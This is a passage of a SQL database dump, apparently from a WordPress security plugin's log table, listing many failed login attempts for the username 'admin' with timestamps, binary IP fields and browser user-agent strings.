Safari/537.36'),(5500,8308,1629537872.614239,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��#ݵ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5501,8310,1629539243.072722,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��=�F�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5502,8310,1629539243.115934,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��=�F�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5503,8311,1629539956.656737,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��/aP3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5504,8313,1629540689.786655,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Dc�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5505,8315,1629542166.023523,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5506,8316,1629542903.446573,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��n-�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5507,8317,1629543581.265557,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����-%','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(5508,8318,1629543713.541203,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���b�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5509,8319,1629544477.500280,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5510,8320,1629545219.533815,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����s�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(5511,8321,1629545284.067501,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��QE8/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5512,8322,1629546926.479405,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5513,8323,1629547750.496585,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��H\"\"�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5514,8324,1629548346.921978,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����\\�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36'),(5515,8325,1629548586.085057,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@rP','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5516,8326,1629549499.393064,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��B�S','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5517,8327,1629549880.268741,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��.��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(5518,8328,1629550357.676214,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����vH','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5519,8334,1629554630.963357,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��D�q?','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(5520,8335,1629555067.572906,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���VE3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5521,8336,1629555795.616965,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(5522,8339,1629557026.003325,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��;u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5523,8340,1629557989.789516,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��H\"\"�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5524,8341,1629558166.247873,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��h�\Z','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'),(5525,8343,1629559357.996614,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���b�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(5526,8346,1629562929.725692,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��@o~ ','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(5527,8348,1629564119.160790,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(5528,8350,1629566486.016496,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��mW�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'),(5529,8352,1629568863.685044,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>}�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36'),(5530,8353,1629570087.784841,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��]qo6','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(5531,8355,1629572308.591549,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��h�\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5532,8356,1629572570.541784,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5533,8357,1629572682.267513,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����^�','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(5534,8358,1629572803.661017,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���B�r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5535,8359,1629573037.777576,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��k�R�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5536,8360,1629573275.573137,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���A�O','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5537,8361,1629573517.633325,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5538,8362,1629573763.865271,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��%���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5539,8363,1629573970.683390,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���(%�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5540,8363,1629573971.384322,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���(%�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5541,8364,1629574027.807873,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��£��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5542,8365,1629574288.437504,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��QDD�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5543,8366,1629574579.556806,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���b�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5544,8367,1629575117.285865,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���ѓ<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5545,8368,1629575198.508728,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��_��[','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(5546,8369,1629575440.536703,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-P�0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5547,8369,1629575441.796350,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-P�0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5548,8370,1629575711.516203,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Z�_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5549,8371,1629576261.560230,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ge��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5550,8372,1629576524.391748,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���D�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5551,8373,1629576834.875885,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��e >�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5552,8373,1629576834.925499,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��e >�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5553,8374,1629577124.533851,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��H�%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5554,8375,1629577417.914751,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����M','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5555,8376,1629577596.995028,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����y','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(5556,8377,1629577709.465635,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5557,8378,1629578006.131881,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5558,8379,1629578333.301583,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���O�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5559,8380,1629578612.347453,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��xO�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5560,8381,1629578781.588790,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���H�%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(5561,8382,1629578965.857023,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\r�>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5562,8383,1629579589.340650,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-wS�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5563,8385,1629580221.002658,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��/k!\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5564,8386,1629580555.635557,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��/p�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5565,8388,1629581140.129508,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5566,8389,1629581787.274268,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5567,8391,1629582366.205987,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(5568,8398,1629584087.538293,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Hӱ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5569,8399,1629584389.589241,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����Q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5570,8400,1629584752.215404,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(5571,8401,1629584756.508559,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���q\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5572,8403,1629585456.302165,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���q�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5573,8406,1629586136.571121,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���a��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5574,8407,1629586499.885468,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���q�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5575,8408,1629586839.226941,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��H\"\"�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5576,8410,1629587196.886913,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\\̆�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5577,8411,1629587536.673285,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g|_Y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5578,8412,1629587858.146407,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����l�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5579,8414,1629588347.169964,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���A��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(5580,8416,1629589550.337448,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����Kj','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(5581,8419,1629590397.306125,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��o]5�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5582,8421,1629590757.204659,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@sP','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5583,8422,1629591150.453660,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���3�:','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5584,8425,1629592938.220810,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��>��G','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5585,8426,1629593139.893859,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����@','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(5586,8427,1629593279.226116,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����)�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5587,8428,1629593688.363733,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���:�L','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5588,8434,1629595527.494516,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��R@�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(5589,8435,1629595571.647074,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����~�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5590,8436,1629595958.076928,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���q��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5591,8438,1629596707.039501,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@sP','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5592,8438,1629596707.174151,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@sP','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5593,8439,1629596718.973601,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3ðP','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(5594,8440,1629597129.301557,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����\\','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5595,8445,1629599127.021064,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����\"d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5596,8451,1629601060.878071,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��J�g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5597,8453,1629601706.841145,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��t˖G','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5598,8454,1629601872.722604,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-wT�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5599,8457,1629602711.146869,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(5600,8458,1629603080.787982,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-]��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5601,8459,1629603480.219394,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g�p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5602,8460,1629603860.034029,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@v�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5603,8461,1629603906.112557,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���,','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36'),(5604,8462,1629604299.894639,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���q�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5605,8465,1629605359.290048,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��J�g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5606,8466,1629605615.379340,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5607,8467,1629605623.034204,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����Ù','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(5608,8468,1629605895.909115,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��.ƺ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5609,8469,1629606116.829751,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5610,8470,1629606372.926518,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5611,8471,1629606614.014280,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��xO�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5612,8472,1629606791.141298,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(5613,8473,1629606846.054948,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���q�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5614,8474,1629607106.804543,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���\r�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5615,8475,1629607287.837220,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5616,8476,1629607554.718185,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���q\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5617,8477,1629607756.511731,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��2M_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5618,8478,1629607948.486226,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3ðP','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(5619,8479,1629608256.442092,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��J�g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5620,8480,1629608501.485248,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��N�$b','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5621,8481,1629608701.974788,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��gk�s','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5622,8482,1629609095.486108,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(5623,8483,1629609184.258965,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3Y��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) 